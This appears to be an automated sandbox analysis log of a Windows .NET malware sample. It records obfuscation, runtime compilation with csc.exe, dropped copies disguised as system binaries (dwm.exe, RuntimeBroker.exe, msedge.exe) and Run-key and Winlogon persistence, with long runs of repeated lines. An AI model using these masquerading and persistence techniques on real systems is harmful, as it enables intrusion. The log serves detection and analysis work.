                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Directory created: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Directory created: C:\Program Files\7-Zip\Lang\3b1a2dfabaeac3
                              Source: jW5TA1J9Z1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: jW5TA1J9Z1.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                              Source: jW5TA1J9Z1.exe Static file information: File size 1960448 > 1048576
                              Source: jW5TA1J9Z1.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1de200
                              Source: jW5TA1J9Z1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.pdb source: jW5TA1J9Z1.exe, 00000000.00000002.1293145015.0000000003547000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.pdb source: jW5TA1J9Z1.exe, 00000000.00000002.1293145015.0000000003547000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              Source: jW5TA1J9Z1.exe, EZlYGB3v2qc5R98kuh4.cs .Net Code: Type.GetTypeFromHandle(Vr7UOIgCCoAAYnsOWtk.h8kAtlqZqYd(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Vr7UOIgCCoAAYnsOWtk.h8kAtlqZqYd(16777245)),Type.GetTypeFromHandle(Vr7UOIgCCoAAYnsOWtk.h8kAtlqZqYd(16777259))})
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline"
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.cmdline"
                              Source: jW5TA1J9Z1.exe Static PE information: section name: .text entropy: 7.553608083833407
                              Source: MQYzEFytUKABjmoxvNTPTwUrcL.exe.0.dr Static PE information: section name: .text entropy: 7.553608083833407
                              Source: RuntimeBroker.exe.0.dr Static PE information: section name: .text entropy: 7.553608083833407
                              Source: MQYzEFytUKABjmoxvNTPTwUrcL.exe0.0.dr Static PE information: section name: .text entropy: 7.553608083833407
                              Source: dwm.exe.0.dr Static PE information: section name: .text entropy: 7.553608083833407
                              Source: jW5TA1J9Z1.exe, oeU2PqukIQ5YM1MemwR.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'oM2Td7IxF37', 'LFrTuTHIIlF', 'agCm5JTKO3SxusB9YXqG', 'CowdBXTK8AoUYIAuR7Y8', 'qQ0bCdTKDloFsJnmmVrb'
                              Source: jW5TA1J9Z1.exe, BxZFJkaWqnrgWh8iVm6.csHigh entropy of concatenated method names: 'LfVaVgocM9', 'LelaJQvqQN', 'ax4aN0SbB4', 'O2le0ITX5lHn9OxkEkuG', 'YD1YXHTXFWswECAq6Gkg', 'HUZCCmTXx08EUwNLcxj4', 'XbyHKoTXfsujtKuQ7fsx', 'zcEuDdTXMN7gJvenyb5I', 'BX16t8TXw70jPkvHgMXE', 'z2FpJXTXLYpgHbC5PV0f'
                              Source: jW5TA1J9Z1.exe, EFGVPAaqXZQvqt4nVoP.csHigh entropy of concatenated method names: 'mofjSdwy9f', 'WxHjTdY1SI', 'zI9jAbVGe2', 'OsCj7VHbnh', 'etajutuWbn', 'CN7jtcFfTk', 'V8NojxTXJhm22xvRdRnG', 'BONbcFTXX05xdTNocJDV', 'GWJSVOTXViuMajw6Xnfp', 'En1xC9TXNSndHjxFoCy4'
                              Source: jW5TA1J9Z1.exe, OxK16LQoI3H2Hs80wZo.csHigh entropy of concatenated method names: 'OpyQhLgFG0', 'rNFQyhRlss', 'JvbikdT5cE1xYDsVZc5F', 'Kt4eFVT5nGZ4nhyyiYLG', 'OBNZkDT5bwUpaUxSIK42', 'Wjdw2mT5vDIeikdvbiEG', 'd8onACT5ESB1gTXoUER8', 'c1IQAQT5pNKPVAeFkpcV', 'PvrmI5T5HeFYEVNIrhWK', 'Vci9pUT5sTtkw8145nyU'
                              Source: jW5TA1J9Z1.exe, BXUBq6T9AHTKr9Ucvrg.csHigh entropy of concatenated method names: 'P9X', 'fJKT6nnRsh', 'NbrTdS7gT2f', 'imethod_0', 'tosT3kb3xF', 'L9ZfceTi9E8jJ3kbXEcf', 'XFrV20TiBBM92jMexHQV', 'XRV4ChTi4fXlNcorYdZB', 'TmrrHVTiebOpFvjIsB9g', 'GxDTZfTi6GP7vSQDsf6g'
                              Source: jW5TA1J9Z1.exe, kmONbEwMvafZU9HlW4O.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'Lxl48vTeihp5u2VmUiSS', 'HC1TIQTekA7wBlP6cNCm', 'l904RjTe1imH5AkvvU39'
                              Source: jW5TA1J9Z1.exe, l1hceWtIHSL5WeBekEg.csHigh entropy of concatenated method names: 'ASetJsw55m', 'vn3GGyTxTmCYGCtNOgER', 'xEo06ITFzacMpHPpuEWA', 'rGjmqcTxSLmnsRt5KypZ', 'npk0kjTxAyQbwwmM5WR7', 'fqbyWhTx7x2RPwxJk5AM', 'U1J', 'P9X', 'N4LTubdeuHV', 'EYeTucaGRkb'

                              Persistence and Installation Behavior

                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File written: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe
                              Source: unknown | Executable created and started: C:\Windows\DiagTrack\RuntimeBroker.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Users\user\Desktop\DVfmUYdt.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Users\user\Desktop\oANPimHy.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Windows\DiagTrack\RuntimeBroker.exe
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Users\user\Desktop\LzHTfErB.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Windows\AppReadiness\RuntimeBroker.exe
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Users\user\Desktop\kDsGBTSe.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Users\user\Desktop\umLWkwXM.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Users\user\Desktop\dMjZyaMQ.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exe
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Users\user\Desktop\bakRRaCx.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Users\user\Desktop\vaQeWJTK.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Users\user\Desktop\UiajPhxi.log
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | File created: C:\Users\user\Desktop\ksQGNTNC.log

                              Boot Survival

                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcL
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jW5TA1J9Z1
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcL
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe | Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
